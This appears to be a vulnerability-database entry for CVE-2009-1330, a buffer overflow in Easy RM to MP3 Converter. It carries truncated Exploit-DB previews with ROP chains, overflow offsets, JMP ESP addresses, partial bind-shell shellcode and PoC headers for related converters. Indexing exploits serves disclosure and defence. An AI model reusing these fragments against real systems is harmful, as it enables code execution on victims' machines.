CVE-2009-1330
Published 2009-04-17
CVE-2009-1330: Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.
Priority P350 · critical · 9.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 21.66% (97.3th percentile)
No detection rules found.
Exploit-DB
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
exploitdb·2016-06-13·CVSS 9.3
---
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    # added missing parts, and some optimisation by Csaba Fitzl
    rop_gadgets = [
        #mov 1000 to EDX - Csaba
        0x41414141, # Filler (compensate)
        0x41414141, # Filler (compensate)
        0x41414141, # Filler (compensate)
        0x10025a1c, # XOR EDX,EDX # RETN
        0x1002bc3d, # MOV EAX,411 # R
Exploit-DB
Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow
exploitdb·2010-08-04
---
# Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Date: 4 / 8 / 2010
# Author: Oh Yaw Theng
# Version: 2.7.3.700
# Tested on: Windows XP SP 1
# CVE : N / A
#!/usr/bin/python
# This exploit works for all the file extensions mention above
# User just need to change the file extension below with the extention mention above
filename = "crash.m3u"
# 35032 bytes are needed before overwriting EIP register
junk = "\x41" * 35032
# JMP ESP in SHELL32.DLL
ret = "\x40\x45\x3D\x77" # 77 3D 45 40 FFE4 JMP ESP
# Bind a shell at TCP Port 5555 (Telnet to this port after exploiting target)
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\
Exploit-DB
Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow
exploitdb·2009-12-23
---
// Exploit Title: Easy RM to MP3 27.3.700 local Buffer OverFlow Exploit on xp sp2
// Date: 24/12/2009
// Author: bibi-info
// Software Link: http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
// Version: 27.3.700
// Tested on: Windows Xp sp2
// greetz : His0k4 & All friends & muslims HaCkers(dz) (18/11/2009 )
#include
#include
#include
/* win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
Exploit-DB
Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow
exploitdb·2009-12-22
---
#
# Exploit for Easy RM to MP3 27.3.700 on Windows Xp sp3
# By d3b4g
# tested on Windows XP SP3
# version:27.3.700
# Date:22.12.09
# From tiny islands of maldivies
#
my $file= "d3b4g.m3u";
my $junk= "A" x 26071;
my $eip = pack('V',0x7C836A08); #jmp esp from kernel32.dll
my $shellcode = "\x90" x 30;
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
Exploit-DB
Easy RM to MP3 Converter - Universal Stack Overflow
exploitdb·2009-04-14
---
#!/usr/bin/python
# Easy RM to MP3 Converter Universall Stack Overflow Exploit
# By Stack
# hihihi
# StaKer : Only Fabri Fibra :d
header = (
"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D"
"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45"
"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46"
"\x69\x6C\x65\x31\x3D")
junk = "\x41"*1244
eip = "\xDB\x70\xBB\x01" # Universall Adress
# Abouts addres
# Executable modules, item 5
# Base=01A20000
# Size=0049D000 (4837376.)
# Entry=01B835B1 MSRMCu_3.
# Name=MSRMCu_3
# Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll
nops = "\x90" * 20
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34514
https://exchange.xforce.ibmcloud.com/vulnerabilities/50326
https://www.exploit-db.com/exploits/39933/
https://www.exploit-db.com/exploits/8427
Published 2009-04-17